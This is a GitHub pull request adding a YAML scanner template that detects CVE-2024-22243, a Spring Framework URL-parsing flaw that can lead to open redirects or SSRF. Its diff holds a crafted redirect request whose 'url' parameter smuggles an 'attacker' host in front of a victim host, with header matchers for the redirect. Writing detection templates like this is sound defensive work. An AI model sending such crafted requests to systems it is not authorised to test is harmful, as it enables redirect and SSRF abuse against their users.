Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Added template for CVE-2024-22243 #11377

Open
wants to merge 1 commit into
base: main
Choose a base branch
from
Open

Added template for CVE-2024-22243 #11377

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
56 changes: 56 additions & 0 deletions CVE-2024-22243.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,56 @@
id: CVE-2024-22243
info:
name: URL Parsing Vulnerability in Java Spring Framework
author: Sean Pesce
severity: high
description: |
A URL-parsing vulnerability in the Java Spring Framework that affects certain versions.
This issue arises from a specific regex in the UriComponentsBuilder class, leading to
unexpected host name extraction. This can cause security flaws like open redirects or
SSRF if trusted host names are used for authorization.
remediation: |
Upgrade to a patched version of the Spring Framework where this vulnerability is resolved.
Avoid using the vulnerable methods for parsing URLs, or implement custom validation to
ensure the host name extracted is as expected. Regularly review and update dependencies to

Check failure on line 14 in CVE-2024-22243.yaml

View workflow job for this annotation

GitHub Actions / lint 

14:95 [trailing-spaces] trailing spaces
prevent such vulnerabilities.
reference:
- https://github.com/spring-projects/spring-framework/issues/22243
- https://security.netapp.com/advisory/ntap-20240524-0001/
- https://spring.io/security/cve-2024-22243
- http://seclists.org/fulldisclosure/2024/Sep/24
- https://github.com/hinat0y/Dataset1
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
cvss-score: 8.1
cve-id: CVE-2024-22243
cwe-id: CWE-601
epss-score: 0.00061
epss-percentile: 0.27896

http:
- raw:
- |
GET /redirect?url=http://attacker%[email protected]/ HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: status
status:
- 302
- type: word
part: header
words:
- "Location: http://attacker%[email protected]/"
- type: regex
part: body
regex:
- "http://victim.com" # Detects the incorrect parsing of the host name
- type: word
part: header
words:
- "Location: http://" # Matching any external redirection URL pattern
- type: word
part: header
words:
- "Location: http://attacker%5Bexample.com@" # Specifically targeting crafted attacker URL

Check failure on line 56 in CVE-2024-22243.yaml

View workflow job for this annotation

GitHub Actions / lint 

56:1 [empty-lines] too many blank lines (1 > 0)
Loading